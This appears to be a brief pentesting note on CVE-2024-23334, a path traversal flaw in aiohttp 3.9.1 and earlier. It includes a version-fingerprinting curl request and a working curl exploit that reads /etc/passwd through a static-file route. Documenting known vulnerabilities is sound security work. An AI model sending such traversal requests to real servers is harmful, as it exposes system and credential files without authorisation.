Aiohttp

aiohttp, a popular asynchronous HTTP client/server framework for Python

CVE-2024-23334 - LFI/Path Traversal vulnerability

Aiohttp =< 3.9.1

$ curl -I http://127.0.0.1:8080
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 5971
Date: Wed, 27 Nov 2024 08:49:10 GMT
Server: Python/3.9 aiohttp/3.9.1

curl -s --path-as-is "http://localhost:8081/staticFolderName/../../../../../etc/passwd"

CVE-2024-23334: A Deep Dive into aiohttp's Directory Traversal Vulnerability

GitHub - wizarddos/CVE-2024-23334: Proof-of-Concept for LFI/Path Traversal vulnerability in Aiohttp =< 3.9.1GitHub